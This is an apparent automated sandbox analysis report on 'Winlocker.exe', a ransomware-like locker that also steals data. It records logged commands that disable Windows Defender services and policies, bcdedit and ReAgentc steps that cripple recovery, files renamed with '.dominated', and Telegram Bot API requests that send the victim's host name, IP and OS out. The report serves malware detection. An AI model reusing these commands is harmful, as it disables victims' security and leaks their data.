| File name: | Winlocker.exe |
| Full analysis: | https://app.any.run/tasks/941611c7-ab97-43e0-9af4-7243ae2bec3c |
| Verdict: | Malicious activity |
| Threats: | Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. |
| Analysis date: | March 29, 2026, 14:43:42 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32+ executable (GUI) x86-64, for MS Windows, 9 sections |
| MD5: | 98C1437726503690A12267BE794A59A9 |
| SHA1: | 2CADE76804615C65C33973D34E04865C009A9B57 |
| SHA256: | A113585F00696C7327979AE04A0D73611E099DE357345CC21B4644F022233497 |
| SSDEEP: | 98304:KIBGB5iWMUvIUckcWbZogG+mxwCMVuqnQjZ3AjQQTVQaORSVyZDy7k7pYi5FVKzf:uqXUN43jfd/BPvg |
MALICIOUS
Disables Windows Defender
- Winlocker.exe (PID: 2452)
Changes the autorun value in the registry
- Winlocker.exe (PID: 2452)
Using BCDEDIT.EXE to modify recovery options
- cmd.exe (PID: 6260)
- cmd.exe (PID: 5116)
Starts REAGENTC.EXE to disable the Windows Recovery Environment
- ReAgentc.exe (PID: 3536)
Changes image file execution options
- Winlocker.exe (PID: 2452)
Disables task manager
- Winlocker.exe (PID: 2452)
Renames files like ransomware
- Winlocker.exe (PID: 2452)
SUSPICIOUS
Application launched itself
- Winlocker.exe (PID: 6816)
Reads the date of Windows installation
- Winlocker.exe (PID: 6816)
Starts CMD.EXE with AutoRun commands disabled
- cmd.exe (PID: 2676)
Starts CMD.EXE for commands execution
- cmd.exe (PID: 2676)
- cmd.exe (PID: 7268)
- cmd.exe (PID: 4272)
- cmd.exe (PID: 2016)
- cmd.exe (PID: 2812)
- cmd.exe (PID: 7788)
- cmd.exe (PID: 6952)
- cmd.exe (PID: 4348)
- cmd.exe (PID: 7888)
- cmd.exe (PID: 7132)
- cmd.exe (PID: 6260)
- cmd.exe (PID: 7324)
- cmd.exe (PID: 7412)
- cmd.exe (PID: 5116)
Takes ownership (TAKEOWN.EXE)
- cmd.exe (PID: 2676)
Uses ICACLS.EXE to modify access control lists
- cmd.exe (PID: 7268)
Found strings related to reading or modifying Windows Defender settings
- Winlocker.exe (PID: 2452)
Stops a currently running service
- sc.exe (PID: 6424)
- sc.exe (PID: 4712)
- sc.exe (PID: 2792)
- sc.exe (PID: 5892)
Service autostart disabling
- cmd.exe (PID: 2016)
- sc.exe (PID: 1176)
- sc.exe (PID: 6112)
- cmd.exe (PID: 7788)
- cmd.exe (PID: 4348)
- sc.exe (PID: 8188)
- cmd.exe (PID: 7132)
- sc.exe (PID: 3612)
Windows service management via SC.EXE
- sc.exe (PID: 1176)
- sc.exe (PID: 6112)
- sc.exe (PID: 8188)
- sc.exe (PID: 3612)
Executable content was dropped or overwritten
- Winlocker.exe (PID: 2452)
Creates/Modifies COM task schedule object
- Winlocker.exe (PID: 2452)
Modifies hosts file to alter network resolution
- Winlocker.exe (PID: 2452)
INFO
Reads security settings of Internet Explorer
- Winlocker.exe (PID: 6816)
Reads the computer name
- Winlocker.exe (PID: 6816)
- Winlocker.exe (PID: 2452)
Checks supported languages
- Winlocker.exe (PID: 6816)
- Winlocker.exe (PID: 2452)
Creates files or folders in the user directory
- Winlocker.exe (PID: 2452)
Launching a file from a Registry key
- Winlocker.exe (PID: 2452)
Create files in a temporary directory
- Winlocker.exe (PID: 2452)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .exe | | | Generic Win/DOS Executable (50) |
|---|---|---|
| .exe | | | DOS Executable Generic (49.9) |
EXIF
EXE
| MachineType: | AMD AMD64 |
|---|---|
| TimeStamp: | 2026:03:03 18:52:00+00:00 |
| ImageFileCharacteristics: | Executable, Large address aware |
| PEType: | PE32+ |
| LinkerVersion: | 14.44 |
| CodeSize: | 6700544 |
| InitializedDataSize: | 3348480 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x5c5e20 |
| OSVersion: | 6 |
| ImageVersion: | - |
| SubsystemVersion: | 6 |
| Subsystem: | Windows GUI |
| FileVersionNumber: | 1.0.0.0 |
| ProductVersionNumber: | 1.0.0.0 |
| FileFlagsMask: | 0x003f |
| FileFlags: | (none) |
| FileOS: | Win32 |
| ObjectFileType: | Executable application |
| FileSubtype: | - |
| LanguageCode: | Neutral |
| CharacterSet: | Unicode |
| CompanyName: | Winlocker |
| FileDescription: | Winlocker |
| FileVersion: | 1.0.0.0 |
| InternalName: | Winlocker.dll |
| LegalCopyright: | |
| OriginalFileName: | Winlocker.dll |
| ProductName: | Winlocker |
| ProductVersion: | 1.0.0 |
| AssemblyVersion: | 1.0.0.0 |
Total processes
177
Monitored processes
43
Malicious processes
2
Suspicious processes
9
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1176 | sc config WinDefend start= disabled | C:\Windows\System32\sc.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Service Control Manager Configuration Tool Exit code: 5 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2016 | "cmd.exe" /c sc config WinDefend start= disabled | C:\Windows\System32\cmd.exe | — | Winlocker.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 5 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2116 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2164 | takeown /F "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /R /D Y | C:\Windows\System32\takeown.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Takes ownership of a file Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2268 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2452 | "C:\Users\admin\AppData\Local\Temp\Winlocker.exe" | C:\Users\admin\AppData\Local\Temp\Winlocker.exe | Winlocker.exe | ||||||||||||
User: admin Company: Winlocker Integrity Level: HIGH Description: Winlocker Version: 1.0.0.0 Modules
| |||||||||||||||
| 2676 | "cmd.exe" /c takeown /F "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /R /D Y | C:\Windows\System32\cmd.exe | — | Winlocker.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2724 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2792 | sc stop Sense | C:\Windows\System32\sc.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Service Control Manager Configuration Tool Exit code: 1062 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2812 | "cmd.exe" /c sc stop WdNisSvc | C:\Windows\System32\cmd.exe | — | Winlocker.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 5 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
2 752
Read events
2 640
Write events
34
Delete events
78
Modification events
| (PID) Process: | (2452) Winlocker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender |
| Operation: | write | Name: | DisableAntiSpyware |
Value: 1 | |||
| (PID) Process: | (2452) Winlocker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender |
| Operation: | write | Name: | DisableRealtimeMonitoring |
Value: 1 | |||
| (PID) Process: | (2452) Winlocker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender |
| Operation: | write | Name: | DisableBehaviorMonitoring |
Value: 1 | |||
| (PID) Process: | (2452) Winlocker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender |
| Operation: | write | Name: | DisableOnAccessProtection |
Value: 1 | |||
| (PID) Process: | (2988) bcdedit.exe | Key: | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{872a075f-9aa9-11f0-b4fb-806e6f6e6963}\Elements\11000001 |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (2988) bcdedit.exe | Key: | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{872a075f-9aa9-11f0-b4fb-806e6f6e6963}\Elements\11000001 |
| Operation: | write | Name: | Element |
Value: 0000000000000000000000000000000006000000000000004800000000000000715E5C2FA985EB1190A89A9B763584210000000000000000745E5C2FA985EB1190A89A9B7635842100000000000000000000000000000000 | |||
| (PID) Process: | (2988) bcdedit.exe | Key: | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{872a075f-9aa9-11f0-b4fb-806e6f6e6963}\Elements\12000002 |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (2988) bcdedit.exe | Key: | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{872a075f-9aa9-11f0-b4fb-806e6f6e6963}\Elements\12000002 |
| Operation: | write | Name: | Element |
Value: \EFI\Boot\Loader.efi | |||
| (PID) Process: | (2988) bcdedit.exe | Key: | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\Description |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (2988) bcdedit.exe | Key: | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\Elements\24000001 |
| Operation: | delete key | Name: | (default) |
Value: | |||
Executable files
1
Suspicious files
21
Text files
6
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3536 | ReAgentc.exe | C:\Windows\System32\Recovery\Winre.wim | — | |
MD5:— | SHA256:— | |||
| 2452 | Winlocker.exe | C:\Users\admin\AppData\Roaming\RtkAudUService.exe | executable | |
MD5:98C1437726503690A12267BE794A59A9 | SHA256:A113585F00696C7327979AE04A0D73611E099DE357345CC21B4644F022233497 | |||
| 3536 | ReAgentc.exe | C:\Windows\System32\Recovery\ReAgent.xml | xml | |
MD5:44B2DA39CEB2C183D5DCD43AA128C2DD | SHA256:894EE2B19608D10DF4BF8B8F5BBCF40CE38C09C1F4C5543B6164F40C04BB270D | |||
| 2452 | Winlocker.exe | C:\Windows\System32\drivers\etc\hosts | text | |
MD5:727C97C003A0457B1B599ED25A0D0BFF | SHA256:A71F62C9B0931FD05D8D4F97B086525DA81965890433CCA4B3F1929C696CC256 | |||
| 3536 | ReAgentc.exe | C:\Windows\Panther\UnattendGC\diagerr.xml | text | |
MD5:3A8D2D92D67445734789F82D6E6D90A6 | SHA256:E80AA5A43C517844228A67E8A49E30EE8CF68979E54BA0A3FE660C80978808C6 | |||
| 2452 | Winlocker.exe | C:\Users\admin\Desktop\commissiongrand.png.dominated | binary | |
MD5:066819BD0423762961D54456923F452B | SHA256:4DAD30A27A44D39AA791C76F7276E725275B1F6B55B641864418DBD2B80E2B8D | |||
| 2452 | Winlocker.exe | C:\Users\admin\Desktop\loansfri.jpg.dominated | binary | |
MD5:77987022000DAD0D21770E700670A1D6 | SHA256:92F66CCDE2E2C68E8F1A2F0F3BCD868FA92FE24B12C88010FDEEECD3DB7F241E | |||
| 3536 | ReAgentc.exe | \\?\Volume{2f5c5e71-85a9-11eb-90a8-9a9b76358421}\EFI\Microsoft\Recovery\BCD | binary | |
MD5:5ED9D938750AA1E94A5BFC97B63847F5 | SHA256:120B2ECEDD61446F575EB39C54EB7261223D0D9F2A4A3510A4983D27258AA8FF | |||
| 3536 | ReAgentc.exe | C:\Windows\Logs\ReAgent\ReAgent.log | text | |
MD5:31584D53C8C53CF2B511083EE77E4A42 | SHA256:F606397F73B504E36CA2790D6AD5BB707A9B980ADC3DF6C30CF64FA3505ECD14 | |||
| 2452 | Winlocker.exe | C:\Users\admin\Pictures\creativeadd.png.dominated | binary | |
MD5:B2922D89F0968311159A045492D19A7C | SHA256:84BE530DA798D68608EE47FCDAB98DE6B8EE685CDF12CDA0579E2A0110F708EE | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
44
TCP/UDP connections
38
DNS requests
17
Threats
79
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5276 | MoUsoCoreWorker.exe | GET | 304 | 20.73.194.208:443 | https://settings-win.data.microsoft.com/settings/v3.0/OneSettings/Client?OSVersionFull=10.0.19045.4046.amd64fre.vb_release.191206-1406&LocalDeviceID=s%3ABAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&FlightRing=Retail&AttrDataVer=186&OSUILocale=en-US&OSSkuId=48&App=WOSC&AppVer=&IsFlightingEnabled=0&TelemetryLevel=1&DeviceFamily=Windows.Desktop | US | — | — | whitelisted |
2452 | Winlocker.exe | GET | 404 | 149.154.166.110:443 | https://api.telegram.org/bot/sendMessage?chat_id=&text=%F0%9F%9A%A8%20%D0%9D%D0%9E%D0%92%D0%90%D0%AF%20%D0%96%D0%95%D0%A0%D0%A2%D0%92%D0%90%20%D0%97%D0%90%D0%A5%D0%92%D0%90%D0%A7%D0%95%D0%9D%D0%90%20ABSOLUTE%20DOMINATION%20%F0%9F%9A%A8%0A%0A%F0%9F%92%BB%20%D0%98%D0%BC%D1%8F%20%D1%85%D0%BE%D1%81%D1%82%D0%B0%3A%20DESKTOP-JGLLJLD%0A%F0%9F%8C%90%20IP%20%D0%B0%D0%B4%D1%80%D0%B5%D1%81%3A%20192.168.100.5%0A%F0%9F%91%A4%20%D0%9F%D0%BE%D0%BB%D1%8C%D0%B7%D0%BE%D0%B2%D0%B0%D1%82%D0%B5%D0%BB%D1%8C%3A%20DESKTOP-JGLLJLD%5Cadmin%0A%F0%9F%96%A5%EF%B8%8F%20%D0%A1%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D0%B0%3A%20Microsoft%20Windows%20NT%2010.0.19045.0%0A%0A%E2%9A%99%EF%B8%8F%20%D0%A1%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D0%B0%20%D1%83%D1%81%D0%BF%D0%B5%D1%88%D0%BD%D0%BE%20%D0%B7%D0%B0%D0%B1%D0%BB%D0%BE%D0%BA%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B0.%20%D0%9E%D0%B6%D0%B8%D0%B4%D0%B0%D0%BD%D0%B8%D0%B5%20%D0%BF%D0%B0%D1%80%D0%BE%D0%BB%D1%8F...%0A%0A%E2%8F%B3%20%D0%9D%D0%B0%D1%87%D0%B0%D0%BB%D0%BE%D1%81%D1%8C%20%D1%88%D0%B8%D1%84%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5... | VG | text | 55 b | malicious |
5316 | svchost.exe | POST | 200 | 20.190.159.129:443 | https://login.live.com/RST2.srf | US | xml | 1.24 Kb | whitelisted |
5316 | svchost.exe | POST | 400 | 20.190.159.129:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text | 203 b | whitelisted |
2452 | Winlocker.exe | GET | 404 | 149.154.166.110:443 | https://api.telegram.org/bot/sendMessage?chat_id=&text=%E2%9C%85%20%D0%A8%D0%B8%D1%84%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5%20%D0%B7%D0%B0%D0%B2%D0%B5%D1%80%D1%88%D0%B5%D0%BD%D0%BE.%20%D0%92%D1%81%D0%B5%D0%B3%D0%BE%20%D0%BE%D0%B1%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D0%B0%D0%BD%D0%BE%3A%2010%20%D1%84%D0%B0%D0%B9%D0%BB%D0%BE%D0%B2. | VG | text | 55 b | unknown |
5316 | svchost.exe | POST | 400 | 20.190.159.129:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text | 203 b | whitelisted |
5316 | svchost.exe | POST | 400 | 20.190.159.129:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text | 203 b | whitelisted |
5316 | svchost.exe | POST | 400 | 20.190.159.129:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text | 203 b | whitelisted |
5316 | svchost.exe | GET | 200 | 23.11.41.157:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAz1vQYrVgL0erhQLCPM8GY%3D | NL | binary | 471 b | whitelisted |
4960 | SIHClient.exe | GET | 304 | 135.233.95.144:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | US | — | — | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
5484 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
4 | System | 192.168.100.255:137 | — | Not routed | — | whitelisted |
5276 | MoUsoCoreWorker.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
— | — | 48.192.1.65:443 | activation-v2.sls.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
4 | System | 192.168.100.255:138 | — | Not routed | — | whitelisted |
3428 | svchost.exe | 172.211.123.248:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
2452 | Winlocker.exe | 149.154.166.110:443 | api.telegram.org | TELEGRAM | VG | malicious |
5316 | svchost.exe | 20.190.159.129:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
5316 | svchost.exe | 23.11.41.157:80 | ocsp.digicert.com | AKAMAI-AMS | NL | whitelisted |
5484 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
api.telegram.org |
| whitelisted |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
2232 | svchost.exe | Misc activity | ET HUNTING Telegram API Domain in DNS Lookup |
2452 | Winlocker.exe | Misc activity | ET HUNTING Telegram API Certificate Observed |
2452 | Winlocker.exe | Misc activity | ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI) |
2452 | Winlocker.exe | Potentially Bad Traffic | SUSPICIOUS [ANY.RUN] Telegram Bot API request (/sendMessage) |
2452 | Winlocker.exe | Misc activity | ET HUNTING Telegram API Request (GET) |
2452 | Winlocker.exe | A Network Trojan was detected | STEALER [ANY.RUN] Generic Stealer Data Exfil via Telegram API (PC name) |
2452 | Winlocker.exe | Potentially Bad Traffic | SUSPICIOUS [ANY.RUN] User IP address exfil via Telegram API |
2452 | Winlocker.exe | A Network Trojan was detected | STEALER [ANY.RUN] Generic Stealer Data Exfil via Telegram API (OS info) |
2452 | Winlocker.exe | Misc activity | ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI) |
2452 | Winlocker.exe | Misc activity | ET HUNTING Telegram API Request (GET) |